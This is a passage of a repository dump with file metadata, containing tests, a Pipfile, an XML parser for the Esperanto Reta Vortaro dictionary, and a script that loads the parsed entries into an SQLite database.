test_refgrp_arrow(parser):\n xml = 
\"\"\"<refgrp tip=\"sin\">\n <ref cel=\"plagx.0o\">plaĝo</ref>\n </refgrp>\"\"\"\n assert Refgrp(parser(xml)).to_text().string == \"→ plaĝo\"\n" }, { "alpha_fraction": 0.5386819243431091, "alphanum_fraction": 0.5816618800163269, "avg_line_length": 14.863636016845703, "blob_id": "75907bf47cd911349858323dd1197a7fc0c37522", "content_id": "88122d1006725fe30927e78d4a3a7d675c5a5200", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 349, "license_type": "no_license", "max_line_length": 42, "num_lines": 22, "path": "/Pipfile", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "[[source]]\nurl = \"https://pypi.org/simple\"\nverify_ssl = true\nname = \"pypi\"\n\n[packages]\nfire = \"*\"\nlxml = \"*\"\ntyping = \"*\"\neo-dicts = {editable = true, path = \".\"}\nhumanize = \"*\"\n\n[dev-packages]\nblack = \"==22.10.0\"\nipython = \"*\"\npytest = \"*\"\nmypy = \"*\"\n# https://github.com/psf/black/issues/2964\nclick = \"<=8.1.0\"\n\n[requires]\npython_version = \"3.11\"\n" }, { "alpha_fraction": 0.582004189491272, "alphanum_fraction": 0.6009629964828491, "avg_line_length": 26.016260147094727, "blob_id": "8cfb485e0afe18bfc085aebff5c60d0fb94577ac", "content_id": "5a07834ea387ee17059365a62f0970f49d3f0042", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3323, "license_type": "no_license", "max_line_length": 79, "num_lines": 123, "path": "/eo_dicts/tests/test_string_with_format.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "from ..parser.string_with_format import StringWithFormat, Format, expand_tld\n\n\ndef test_init():\n string = StringWithFormat()\n assert string.string == \"\"\n assert string.format == {}\n\n\ndef test_add():\n string = StringWithFormat()\n string.add(\"Saluton\")\n assert string.string == \"Saluton\"\n string.add(\" mondo!\")\n assert string.string == \"Saluton mondo!\"\n\n\ndef test_add_format():\n string = StringWithFormat()\n string.add_italic(\"Saluton\")\n assert string.string == \"Saluton\"\n assert string.format == {\"italic\": [(0, 7)]}\n string.add_italic(\" mondo!\")\n assert string.string == \"Saluton mondo!\"\n assert string.format == {\"italic\": [(0, 14)]}\n\n\ndef test_add_format_final():\n string = StringWithFormat()\n string.add(\"Saluton\")\n assert string.string == \"Saluton\"\n string.add_italic(\" mondo!\")\n assert string.string == \"Saluton mondo!\"\n assert string.format == {\"italic\": [(7, 14)]}\n\n\ndef test_merge():\n string1 = StringWithFormat()\n string2 = StringWithFormat()\n string1.add_italic(\"N\")\n string2.add_italic(\"u\")\n string1.add(string2)\n assert string1.string == \"Nu\"\n assert string1.format == {\"italic\": [(0, 2)]}\n\n\ndef test_prepend():\n string = StringWithFormat()\n string.add_italic(\"mondo!\")\n assert string.format == {\"italic\": [(0, 6)]}\n string.prepend(\"Saluton \")\n assert string.string == \"Saluton mondo!\"\n assert string.format == {\"italic\": [(8, 14)]}\n\n\ndef test_strip_left():\n string = StringWithFormat()\n string.add_italic(\" Bonan tagon\")\n string = string.strip()\n assert string.string == \"Bonan tagon\"\n assert string.format == {\"italic\": [(0, 11)]}\n\n\ndef test_strip_right():\n string = StringWithFormat()\n string.add_italic(\"Bonan tagon \")\n string = string.strip()\n assert string.string == \"Bonan tagon\"\n assert string.format == {\"italic\": [(0, 11)]}\n\n\ndef test_join():\n s1 = 
StringWithFormat().add_italic(\"a\")\n s2 = StringWithFormat(\"b\")\n s3 = StringWithFormat().add_italic(\"c\")\n string = StringWithFormat.join([s1, s2, s3], \"-\")\n assert string.string == \"a-b-c\"\n assert string.format == {\"italic\": [(0, 1), (4, 5)]}\n\n\ndef test_encode_format():\n s = StringWithFormat().add_bold(\"Bonan\").add_italic(\" tagon\").add_bold(\"!\")\n assert s.encode_format() == \"bold:0,5;11,12\\nitalic:5,11\"\n\n\ndef test_expand_tld():\n s = StringWithFormat()\n s.add(\"amik\", Format.TLD).add(\"eco, ge\").add(\"patr\", Format.TLD).add(\"oj\")\n s = expand_tld(s)\n assert s.string == \"amikeco, gepatroj\"\n assert s.format == {\"tld\": [(0, 7), (9, 17)]}\n\n\ndef test_expand_tld_start():\n s = StringWithFormat()\n s.add(\"a\").add(\"b\", Format.TLD)\n s = expand_tld(s)\n assert s.string == \"ab\"\n assert s.format == {\"tld\": [(0, 2)]}\n\n\ndef test_expand_tld_start2():\n s = StringWithFormat()\n s.add(\",a\").add(\"b\", Format.TLD)\n s = expand_tld(s)\n assert s.string == \",ab\"\n assert s.format == {\"tld\": [(1, 3)]}\n\n\ndef test_expand_tld_end():\n s = StringWithFormat()\n s.add(\"a\", Format.TLD).add(\"b\")\n s = expand_tld(s)\n assert s.string == \"ab\"\n assert s.format == {\"tld\": [(0, 2)]}\n\n\ndef test_expand_tld_end2():\n s = StringWithFormat()\n s.add(\"a\", Format.TLD).add(\"b,\")\n s = expand_tld(s)\n assert s.string == \"ab,\"\n assert s.format == {\"tld\": [(0, 2)]}\n" }, { "alpha_fraction": 0.5357357859611511, "alphanum_fraction": 0.5374924540519714, "avg_line_length": 27.791908264160156, "blob_id": "e78164f3047bd726cd9d5b09ba86ac37462030d2", "content_id": "883eff8967e45d73b9e7d24e2b121931d0d1ac9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19934, "license_type": "no_license", "max_line_length": 88, "num_lines": 692, "path": "/eo_dicts/parser/revo.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "import os.path\nimport fire\nimport functools\nimport xml.etree.ElementTree as ET\nfrom lxml import etree\nfrom ..utils import add_hats, letter_enumerate\nfrom .string_with_format import StringWithFormat, Format\nfrom abc import abstractmethod\nfrom typing import Union, Iterator, Optional, Type, TypeVar, cast\n\n\nT = TypeVar(\"T\", bound=\"Node\")\n\n\ndef remove_extra_whitespace(string: str) -> str:\n cleaned = \" \".join(string.split())\n # Preserve trailing whitespace\n if string and string[-1] == \" \":\n cleaned += \" \"\n if string and string[0] == \" \":\n cleaned = \" \" + cleaned\n return cleaned\n\n\nclass Node:\n def __init__(\n self, node: ET.Element, extra_info: Optional[dict[str, \"Node\"]] = None\n ):\n if extra_info is None:\n extra_info = {}\n self.parent: Optional[\"Node\"] = extra_info.get(\"parent\")\n self.children: list[Union[str, \"Node\"]]\n self.parse_children(node, extra_info)\n\n def __repr__(self):\n keys = \" \".join(\n \"{}={}\".format(k, repr(v))\n for k, v in self.__dict__.items()\n if k != \"parent\"\n )\n return \"<%s %s>\" % (self.__class__.__name__, keys)\n\n def parse_children(self, node: ET.Element, extra_info: dict[str, \"Node\"]) -> None:\n self.children = []\n if node.text and node.text.strip():\n self.children.append(remove_extra_whitespace(node.text))\n for child in node:\n if child.tag in [\"adm\", \"bld\", \"fnt\"]:\n if child.tail and child.tail.strip():\n self.children.append(remove_extra_whitespace(child.tail))\n continue\n tag_class = globals()[child.tag.title()]\n extra_info[\"parent\"] = self\n 
self.children.append(tag_class(child, extra_info))\n if child.tail and child.tail.strip():\n self.children.append(remove_extra_whitespace(child.tail))\n self.children = self.add_whitespace_nodes_to_children()\n # print(node.tag, '- children:', self.children)\n\n def add_whitespace_nodes_to_children(self) -> list[Union[str, \"Node\"]]:\n children = []\n for n, child in enumerate(self.children):\n children.append(child)\n if isinstance(child, Ref) and n < len(self.children) - 1:\n next_node = self.children[n + 1]\n # print(\"DETECTED ref, next:\", next_node, next_node.__class__)\n if isinstance(next_node, str) and next_node[0] not in \". ,;:\":\n children.append(\" \")\n elif not isinstance(next_node, str):\n children.append(\" \")\n elif (\n isinstance(child, Klr) and n < len(self.children) - 1 and child.children\n ):\n if (\n isinstance(child.children[-1], str)\n and child.children[-1][-1] != \" \"\n ):\n children.append(\" \")\n return children\n\n def get(self, *args: Type[T]) -> Iterator[T]:\n \"Get nodes based on their class\"\n for tag in self.children:\n if tag.__class__ in args:\n tag = cast(T, tag)\n yield tag\n\n def get_except(self, *args: Type[\"Node\"]) -> Iterator[Union[str, \"Node\"]]:\n for tag in self.children:\n if tag.__class__ not in args:\n yield tag\n\n def get_recursive(self, *args: Type[T]) -> Iterator[T]:\n if not hasattr(self, \"children\"):\n return\n for tag in self.children:\n if tag.__class__ in args:\n tag = cast(T, tag)\n yield tag\n elif isinstance(tag, str):\n continue\n else:\n for nested_tag in tag.get_recursive(*args):\n yield nested_tag\n\n def get_ancestor(self, *args: Type[T]) -> T:\n if not self.parent:\n raise\n elif self.parent.__class__ in args:\n parent = cast(T, self.parent)\n return parent\n return self.parent.get_ancestor(*args)\n\n @abstractmethod\n def to_text(self) -> StringWithFormat:\n pass\n\n def main_word(self) -> str:\n kap = getattr(self, \"kap\", \"\")\n if not kap:\n kap = self.get_ancestor(Art).kap[0]\n if kap is None:\n return \"\"\n return add_hats(kap.strip())\n\n def translations(self) -> dict[str, dict[str, dict[Optional[int], list[str]]]]:\n trds: dict[str, dict[str, dict[Optional[int], list[str]]]] = {}\n for tag in self.get_recursive(Trd, Trdgrp):\n if not isinstance(tag.parent, (Drv, Snc)):\n continue\n\n # N° of snc inside the Drv\n snc_index = None\n if isinstance(tag.parent, Snc):\n if not isinstance(tag.parent.parent, Drv):\n # TODO check if we are missing something\n # example: -ad (ad.xml and subdrv)\n continue\n drv = tag.parent.parent\n main_word = drv.main_word()\n\n sncs = [t for t in drv.children if isinstance(t, Snc)]\n # If there is only one Snc we don't need to specify a snc_index\n if len(sncs) > 1:\n snc_index = sncs.index(tag.parent) + 1\n else:\n main_word = tag.parent.main_word()\n if main_word not in trds:\n trds[main_word] = {}\n\n if not isinstance(tag, (Trd, Trdgrp)):\n raise\n lng, texts = tag.parse_trd()\n if isinstance(texts, str):\n texts = [texts]\n\n if lng not in trds[main_word]:\n trds[main_word][lng] = {}\n trds[main_word][lng][snc_index] = texts\n\n return trds\n\n\nclass TextNode(Node):\n # Format enum, can also be a list\n base_format: Union[list[Format], Format, None] = None\n\n def to_text(self) -> StringWithFormat:\n parts: list[StringWithFormat] = []\n for node in self.children:\n if isinstance(node, str):\n parts.append(StringWithFormat(node))\n else:\n parts.append(node.to_text())\n try:\n content = StringWithFormat()\n for part in parts:\n content += part\n # print(self.children, 
\"\\n\", parts, \"\\n\")\n return content.apply_format(self.base_format)\n except Exception:\n print(self.children)\n print(parts)\n raise\n\n\nclass Art(Node):\n def __init__(self, node: ET.Element, extra_info=None):\n if extra_info is None:\n extra_info = {}\n assert node.tag == \"art\"\n rad = node.find(\"kap/rad\")\n if rad is None:\n raise\n tail = \"\"\n if rad.tail:\n tail = rad.tail.strip()\n self.kap = (rad.text, tail)\n extra_info[\"radix\"] = self.kap[0]\n super().__init__(node, extra_info)\n\n def derivations(self) -> Iterator[Union[\"Subart\", \"Drv\"]]:\n for subart in self.get(Subart):\n for drv in subart.derivations():\n yield drv\n for drv in self.get(Drv):\n yield drv\n assert not list(self.get(Snc))\n\n def to_text(self):\n raise Exception(\"Do not use Art.to_text() directly\")\n\n\nclass Kap(TextNode):\n pass\n\n\nclass Rad(TextNode):\n pass\n\n\nclass Gra(TextNode):\n pass\n\n\nclass Mlg(TextNode):\n pass\n\n\nclass Vspec(TextNode):\n def to_text(self) -> StringWithFormat:\n return StringWithFormat(\"(\").add(super().to_text()).add(\")\")\n\n\nclass Ofc(TextNode):\n def to_text(self) -> StringWithFormat:\n return StringWithFormat(\"\")\n\n\nclass Var(TextNode):\n pass\n\n\nclass Subart(TextNode):\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.mrk = \"\"\n self.kap = \"\"\n\n def derivations(self) -> Iterator[Union[\"Subart\", \"Drv\"]]:\n # Note that this method sometimes will return the subart node\n drvs = list(self.get(Drv))\n if len(drvs) == 1:\n self.kap = drvs[0].kap\n self.mrk = drvs[0].mrk\n yield self\n else:\n for drv in drvs:\n if not self.kap:\n self.kap = drv.kap\n self.mrk = drv.mrk\n yield drv\n # al.xml, last <subart> has <snc> as a direct child\n if not drvs and list(self.get(Snc)):\n yield self\n\n\nclass Drv(Node):\n def __init__(self, node: ET.Element, extra_info=None):\n self.mrk = node.get(\"mrk\") or \"\"\n if not extra_info:\n extra_info = {}\n kap_node = node.find(\"kap\")\n assert kap_node is not None\n kap = Kap(kap_node, extra_info)\n self.kap = kap.to_text().string\n super().__init__(node, extra_info)\n self.parse_children(node, extra_info)\n\n def read_snc(self) -> list[StringWithFormat]:\n meanings = []\n n_sncs = len(list(self.get(Snc)))\n for n, snc in enumerate(self.get(Snc)):\n if n_sncs > 1:\n text = StringWithFormat(\"%s. \" % (n + 1,))\n text += snc.to_text()\n else:\n text = snc.to_text()\n meanings.append(text)\n return meanings\n\n def to_text(self) -> StringWithFormat:\n content = StringWithFormat()\n\n # Kap and Fnt ignored\n for node in self.get(Gra, Uzo, Dif, Ref):\n if isinstance(node, Ref) and node.tip != \"dif\":\n continue\n content += node.to_text()\n if isinstance(node, Gra):\n content += \" \"\n\n meanings = self.read_snc()\n\n for nn, subdrv in letter_enumerate(self.get(Subdrv)):\n text = subdrv.to_text()\n text.prepend(\"%s. 
\" % nn.upper())\n if nn == \"a\" and (meanings or len(content)):\n text.prepend(\"\\n\\n\")\n meanings.append(text)\n\n content += StringWithFormat.join(meanings, \"\\n\\n\")\n\n # Renaming node2 to node causes issues with mypy\n for node2 in self.get_except(Subdrv, Snc, Gra, Uzo, Fnt, Kap, Dif, Mlg):\n if isinstance(node2, Ref) and node2.tip == \"dif\":\n continue\n if isinstance(node2, str):\n # Nodes added by hand in add_whitespace_nodes_to_children\n content += node2\n else:\n content += node2.to_text()\n\n return content\n\n\nclass Subdrv(Node):\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.parse_children(node, extra_info)\n\n def to_text(self) -> StringWithFormat:\n content = StringWithFormat()\n\n # Fnt omitted\n for node in self.get(Dif, Gra, Uzo, Ref):\n if isinstance(node, Ref) and node.tip != \"dif\":\n continue\n content += node.to_text()\n\n for n, snc in enumerate(self.get(Snc), 1):\n text = snc.to_text()\n text.prepend(\"%s. \" % n)\n text.prepend(\"\\n\\n\")\n content += text\n\n for text_node in self.get_except(Snc, Gra, Uzo, Fnt, Dif, Ref):\n if isinstance(text_node, Ref) and text_node.tip == \"dif\":\n continue\n if isinstance(text_node, str):\n raise\n content += text_node.to_text()\n return content\n\n\nclass Snc(Node):\n def __init__(self, node, extra_info=None):\n self.mrk = node.get(\"mrk\")\n if not extra_info:\n extra_info = {}\n # example: snc without mrk but drv has it (see zoni in zon.xml)\n self.mrk = self.mrk or extra_info[\"radix\"]\n super().__init__(node, extra_info)\n\n def to_text(self) -> StringWithFormat:\n content = StringWithFormat()\n\n # Fnt ignored\n for node in self.get(Gra, Uzo, Dif, Ref):\n if isinstance(node, Ref) and node.tip != \"dif\":\n continue\n content += node.to_text()\n if isinstance(node, Gra):\n content += \" \"\n\n if list(self.get(Subsnc)):\n content += \"\\n\\n\"\n subs = []\n for n, subsnc in letter_enumerate(self.get(Subsnc)):\n text = subsnc.to_text()\n text.prepend(\"%s) \" % n)\n subs.append(text)\n content += StringWithFormat.join(subs, \"\\n\\n\")\n\n # Renaming node2 to node causes issues with mypy\n for node2 in self.get_except(Gra, Uzo, Fnt, Dif, Subsnc):\n if isinstance(node2, Ref) and node2.tip == \"dif\":\n continue\n if isinstance(node2, str):\n # Nodes added by hand in add_whitespace_nodes_to_children\n content += node2\n else:\n content += node2.to_text()\n\n return content\n\n\nclass Subsnc(TextNode):\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.mrk = node.get(\"mrk\")\n\n\nclass Uzo(TextNode):\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.tip = node.get(\"tip\")\n if self.tip == \"fak\":\n self.base_format = Format.UZO_FAKO\n\n def to_text(self) -> StringWithFormat:\n text = super().to_text()\n if self.tip == \"stl\":\n mapping = {\n \"FRAZ\": \"(frazaĵo)\",\n \"FIG\": \"(figure)\",\n \"VULG\": \"(vulgare)\",\n \"RAR\": \"(malofte)\",\n \"POE\": \"(poezie)\",\n \"ARK\": \"(arkaismo)\",\n \"EVI\": \"(evitinde)\",\n \"KOMUNE\": \"(komune)\",\n \"NEO\": \"(neologismo)\",\n }\n text = StringWithFormat(mapping.get(text.string, text.string))\n return text + \" \"\n\n\nclass Dif(TextNode):\n pass\n\n\nclass Tezrad(Node):\n def to_text(self) -> StringWithFormat:\n return StringWithFormat(\"\")\n\n\n# TODO link to url\nclass Url(TextNode):\n pass\n\n\n# TODO link\nclass Lstref(TextNode):\n pass\n\n\nclass Trd(TextNode):\n def __init__(self, node: 
ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.lng = node.get(\"lng\") or \"\"\n\n # abel.xml has a trd inside a dif\n def to_text(self) -> StringWithFormat:\n if isinstance(self.parent, Dif):\n return super().to_text()\n return StringWithFormat(\"\")\n\n def parse_trd(self) -> tuple[str, str]:\n return (self.lng, super().to_text().string)\n\n\nclass Trdgrp(Node):\n def __init__(self, node: ET.Element, extra_info=None):\n self.lng = node.get(\"lng\") or \"\"\n super().__init__(node, extra_info)\n\n def to_text(self) -> StringWithFormat:\n return StringWithFormat(\"\")\n\n def parse_trd(self) -> tuple[str, list[str]]:\n return (self.lng, [trd.parse_trd()[1] for trd in self.get(Trd)])\n\n\nclass Ref(TextNode):\n @staticmethod\n def add_arrow(tip: Optional[str], text: StringWithFormat) -> StringWithFormat:\n if not tip:\n return text\n symbol = \"→\"\n if tip == \"dif\":\n symbol = \"=\"\n content = StringWithFormat(symbol + \" \")\n content += text\n return content\n\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.tip = node.get(\"tip\")\n\n def to_text(self) -> StringWithFormat:\n if isinstance(self.parent, (Dif, Rim, Ekz, Klr)):\n return super().to_text()\n return Ref.add_arrow(self.tip, super().to_text())\n\n # symbol = \"→\"\n # if self.tip == 'malprt':\n # symbol = \"↗\"\n # elif self.tip == \"prt\":\n # symbol = \"↘\"\n # content = StringWithFormat(symbol+' ')\n # content += super().to_text()\n # return content\n\n\nclass Refgrp(TextNode):\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.tip = node.get(\"tip\")\n\n def to_text(self) -> StringWithFormat:\n if isinstance(self.parent, (Dif, Rim, Ekz, Klr)):\n return super().to_text()\n return Ref.add_arrow(self.tip, super().to_text())\n\n\nclass Sncref(TextNode):\n pass\n\n\nclass Ekz(TextNode):\n base_format = Format.EKZ\n\n def to_text(self) -> StringWithFormat:\n content = super().to_text()\n content.prepend(\"\\n\")\n return content\n\n\nclass Tld(Node):\n def __init__(self, node: ET.Element, extra_info=None):\n self.radix = \"\"\n self.lit = node.get(\"lit\") or \"\"\n if extra_info:\n self.radix = extra_info.get(\"radix\") or \"\"\n self.radix = self.radix.strip()\n self.parent = extra_info.get(\"parent\")\n\n def to_text(self) -> StringWithFormat:\n content = None\n if self.lit and self.radix:\n content = StringWithFormat(self.lit + self.radix[1:])\n else:\n content = StringWithFormat(self.radix or \"-----\")\n if isinstance(self.parent, Ekz) or (\n self.parent and isinstance(self.parent.parent, Ekz)\n ):\n content = content.apply_format(Format.TLD)\n return content\n\n\n# found in amik.xml\nclass Klr(TextNode):\n pass\n\n\nclass Rim(TextNode):\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.num = node.get(\"num\") or \"\"\n\n def to_text(self) -> StringWithFormat:\n string = super().to_text()\n if self.num:\n content = StringWithFormat().add_bold(\"\\n\\nRim. %s: \" % self.num)\n content += string\n return content\n return StringWithFormat().add_bold(\"\\n\\nRim. 
\").add(string)\n\n\nclass Aut(TextNode):\n def to_text(self) -> StringWithFormat:\n return StringWithFormat(\"[\").add(super().to_text()).add(\"]\")\n\n\nclass Fnt(Node):\n def to_text(self) -> StringWithFormat:\n return StringWithFormat(\"\")\n\n\n# found in zon.xml\nclass Frm(TextNode):\n pass\n\n\n# TODO sub format (seen en acetil.xml)\nclass Sub(TextNode):\n pass\n\n\nclass Sup(TextNode):\n pass\n\n\nclass K(TextNode):\n pass\n\n\nclass G(TextNode):\n pass\n\n\n# TODO bold format (example: abstrakta)\nclass Em(TextNode):\n pass\n\n\nclass Ctl(TextNode):\n pass\n\n\nclass Ind(TextNode):\n pass\n\n\nclass Mll(TextNode):\n pass\n\n\nclass Nom(TextNode):\n pass\n\n\nclass Esc(TextNode):\n pass\n\n\nclass Nac(TextNode):\n pass\n\n\nclass Baz(TextNode):\n pass\n\n\n# seen in dank.xml, danke al\nclass Mis(TextNode):\n pass\n\n\n# TODO strikethrough\nclass Ts(TextNode):\n pass\n\n\n# https://github.com/sstangl/tuja-vortaro/blob/master/revo/convert-to-js.py\[email protected]\ndef entities_dict() -> dict[str, str]:\n entities: dict[str, str] = {}\n\n base_dir = os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"revo\", \"dtd\")\n with open(os.path.join(base_dir, \"vokosgn.dtd\"), \"rb\") as f:\n dtd = etree.DTD(f)\n for entity in dtd.iterentities():\n entities[entity.name] = entity.content\n\n with open(os.path.join(base_dir, \"vokourl.dtd\"), \"rb\") as f:\n dtd = etree.DTD(f)\n for entity in dtd.iterentities():\n entities[entity.name] = entity.content\n\n with open(os.path.join(base_dir, \"vokomll.dtd\"), \"rb\") as f:\n dtd = etree.DTD(f)\n for entity in dtd.iterentities():\n entities[entity.name] = entity.content\n return entities\n\n\ndef parse_article(filename: str) -> Art:\n with open(filename) as f:\n article = f.read()\n\n xml_parser = ET.XMLParser()\n for entity, value in entities_dict().items():\n xml_parser.entity[entity] = value\n tree = ET.fromstring(article, parser=xml_parser)\n\n art = tree.find(\"art\")\n if not art:\n raise Exception(\"XML file does not contain <art> tag!\")\n return Art(art)\n\n\ndef main(word: str):\n art = parse_article(\"xml/%s.xml\" % word)\n print(art)\n print()\n print(art.to_text())\n\n\nif __name__ == \"__main__\":\n fire.Fire(main)\n" }, { "alpha_fraction": 0.6394850015640259, "alphanum_fraction": 0.6394850015640259, "avg_line_length": 28.125, "blob_id": "5f5142c380c9697277910027da2b8cf500090264", "content_id": "bbd206450f8087a557cc754db4aa220350a576b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "no_license", "max_line_length": 65, "num_lines": 8, "path": "/eo_dicts/tests/test_utils.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "from ..utils import add_hats\n\n\ndef test_add_hats():\n assert add_hats(\"\") == \"\"\n assert add_hats(\"saluton\") == \"saluton\"\n assert add_hats(\"sercxi\") == \"serĉi\"\n assert add_hats(\"CxSxGxJxHxUxcxsxgxjxhxux\") == \"ĈŜĜĴĤŬĉŝĝĵĥŭ\"\n" }, { "alpha_fraction": 0.5424151420593262, "alphanum_fraction": 0.5439121723175049, "avg_line_length": 27.959537506103516, "blob_id": "8c11542a7a4173048ce6472cc52f839300f7170f", "content_id": "ce6561e6e6b59183b3ac5531f60d33d996ca1476", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10022, "license_type": "no_license", "max_line_length": 95, "num_lines": 346, "path": "/eo_dicts/process_revo.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "import os\nimport 
sqlite3\nimport glob\nimport itertools\nimport json\nfrom typing import TypedDict, Optional\n\nfrom .utils import get_languages, get_disciplines, output_dir\nfrom .parser import revo\nfrom .parser.string_with_format import expand_tld\n\n\nclass DefinitionDict(TypedDict):\n article_id: int\n word: str\n mark: str\n definition: str\n format: str\n trads: dict\n position: int\n definition_id: Optional[int]\n\n\nclass EntryDict(TypedDict):\n article_id: int\n word: str\n definition: DefinitionDict\n\n\ndef insert_translations(trads: list[dict], cursor: sqlite3.Cursor) -> None:\n # flatten\n all_trans: list[dict] = []\n for translation in trads:\n for snc_index, words in translation[\"data\"].items():\n for word in words:\n all_trans.append(\n dict(translation=word, snc_index=snc_index, **translation)\n )\n\n all_trans.sort(\n key=lambda x: (\n x[\"lng\"],\n x[\"translation\"],\n x[\"snc_index\"] is None,\n x[\"snc_index\"],\n )\n )\n\n for translation in all_trans:\n cursor.execute(\n \"\"\"INSERT INTO translations_{code}\n (definition_id, snc_index, word, translation)\n VALUES (?,?,?,?)\"\"\".format(\n code=translation[\"lng\"]\n ),\n (\n translation[\"row_id\"],\n translation[\"snc_index\"],\n translation[\"word\"],\n translation[\"translation\"],\n ),\n )\n\n\ndef create_db(output_db: str) -> sqlite3.Connection:\n base_dir = os.path.dirname(__file__)\n db_filename = os.path.join(base_dir, output_db)\n try:\n os.remove(db_filename)\n except Exception:\n pass\n conn = sqlite3.connect(db_filename)\n c = conn.cursor()\n c.execute(\n \"\"\"\n CREATE TABLE words (\n id integer primary key,\n word text,\n definition_id integer\n )\n \"\"\"\n )\n # position: relative order inside the article\n c.execute(\n \"\"\"\n CREATE TABLE definitions (\n id integer primary key,\n article_id integer,\n words text,\n mark text,\n position integer,\n definition text,\n format text\n )\n \"\"\"\n )\n\n return conn\n\n\ndef create_langs_tables(cursor: sqlite3.Cursor, entries_per_lang: dict) -> None:\n cursor.execute(\n \"\"\"\n CREATE TABLE languages (\n id integer primary key,\n code text,\n name text,\n num_entries integer\n )\n \"\"\"\n )\n\n lang_names = {\n lang_def[\"code\"]: (order, lang_def[\"name\"])\n for order, lang_def in enumerate(get_languages())\n }\n # Normal sort won't consider ĉ, ŝ, ...,\n # get_languages() gives the correct order\n langs = sorted(entries_per_lang.keys(), key=lambda x: lang_names[x][0])\n\n for lang in langs:\n cursor.execute(\n \"\"\"\n CREATE TABLE translations_{lang} (\n id integer primary key,\n definition_id integer,\n snc_index integer,\n word text,\n translation text\n )\n \"\"\".format(\n lang=lang\n )\n )\n\n cursor.execute(\n \"\"\"\n INSERT INTO languages (code, name, num_entries)\n VALUES (?, ?, ?)\n \"\"\",\n (lang, lang_names[lang][1], entries_per_lang[lang]),\n )\n\n\ndef create_disciplines_tables(cursor: sqlite3.Cursor) -> None:\n cursor.execute(\n \"\"\"\n CREATE TABLE disciplines (\n id integer primary key,\n code text,\n name text\n )\n \"\"\"\n )\n\n for code, discipline in get_disciplines().items():\n cursor.execute(\n \"INSERT INTO disciplines (code, name) VALUES (?, ?)\", (code, discipline)\n )\n\n\ndef create_version_table(cursor: sqlite3.Cursor) -> None:\n base_dir = os.path.dirname(__file__)\n version = \"\"\n with open(os.path.join(base_dir, \"..\", \"revo\", \"VERSION\"), \"r\") as f:\n version = f.read().strip()\n\n cursor.execute(\"CREATE TABLE version (id text primary key)\")\n cursor.execute(\"INSERT INTO version (id) values (?)\", 
(version,))\n\n\ndef parse_article(filename: str, num_article: int, verbose=False) -> list[EntryDict]:\n art = None\n try:\n art = revo.parse_article(filename)\n except Exception:\n print(\"Error parsing %s\" % filename)\n raise\n\n found_words = []\n entries: list[EntryDict] = []\n has_subart = False\n drvs = list(art.derivations())\n for pos, drv in enumerate(drvs, 1):\n if isinstance(drv, revo.Subart):\n has_subart = True\n\n if pos == len(drvs) and has_subart and not drv.kap:\n # first subart contains the whole article,\n # so this snc will not be needed\n continue\n\n main_word_txt = drv.main_word()\n found_words.append(main_word_txt)\n row_id = None\n content = drv.to_text()\n content = expand_tld(content)\n assert \"StringWithFormat\" not in content.string\n\n # definition_id will be used to check whether the definition is already in the database\n definition: DefinitionDict = dict(\n article_id=num_article,\n word=main_word_txt,\n mark=drv.mrk,\n definition=content.string,\n format=content.encode_format(),\n trads=drv.translations(),\n position=pos,\n definition_id=None,\n )\n # note that before inserting the entries will be sorted by 'word'\n first_word = True\n for word in main_word_txt.split(\", \"):\n word = word.strip()\n # \"definition\" dict is shared between entries in this loop\n entries.append(\n dict(article_id=num_article, word=word, definition=definition)\n )\n if first_word:\n first_word = False\n # Avoid duplication of translations\n definition = definition.copy()\n definition[\"trads\"] = {}\n\n if verbose:\n print(filename, drv.mrk, row_id)\n else:\n print(filename, drv.mrk)\n\n return entries\n\n\ndef create_index(cursor: sqlite3.Cursor) -> None:\n cursor.execute(\"CREATE INDEX index_word_words ON words (word)\")\n cursor.execute(\"CREATE INDEX index_definition_id_words ON words (definition_id)\")\n\n\ndef write_stats(entries_per_lang: dict) -> None:\n base_dir = os.path.dirname(__file__)\n with open(os.path.join(base_dir, \"..\", \"stats.json\"), \"w\") as f:\n json.dump(entries_per_lang, f, ensure_ascii=False, indent=4)\n\n\ndef insert_entries(\n entries: list[EntryDict], cursor: sqlite3.Cursor, min_entries_to_include_lang: int\n) -> None:\n entries = sorted(entries, key=lambda x: x[\"word\"].lower())\n translations = []\n for entry in entries:\n print(entry[\"word\"])\n\n if not entry[\"definition\"][\"definition_id\"]:\n definition = entry[\"definition\"]\n cursor.execute(\n \"\"\"INSERT INTO definitions (\n article_id, words, mark, position, definition, format)\n values (?, ?, ?, ?, ?, ?)\"\"\",\n (\n definition[\"article_id\"],\n definition[\"word\"],\n definition[\"mark\"],\n definition[\"position\"],\n definition[\"definition\"],\n definition[\"format\"],\n ),\n )\n entry[\"definition\"][\"definition_id\"] = cursor.lastrowid\n\n assert entry[\"definition\"][\"definition_id\"] is not None\n def_id: int = entry[\"definition\"][\"definition_id\"]\n\n cursor.execute(\n \"INSERT into words (word, definition_id) values (?, ?)\",\n [entry[\"word\"], def_id],\n )\n\n trads = entry[\"definition\"][\"trads\"]\n if trads:\n for word, more_trads in trads.items():\n for lng, trans_data in more_trads.items():\n translations.append(\n dict(row_id=def_id, word=word, lng=lng, data=trans_data)\n )\n\n translations = sorted(translations, key=lambda x: 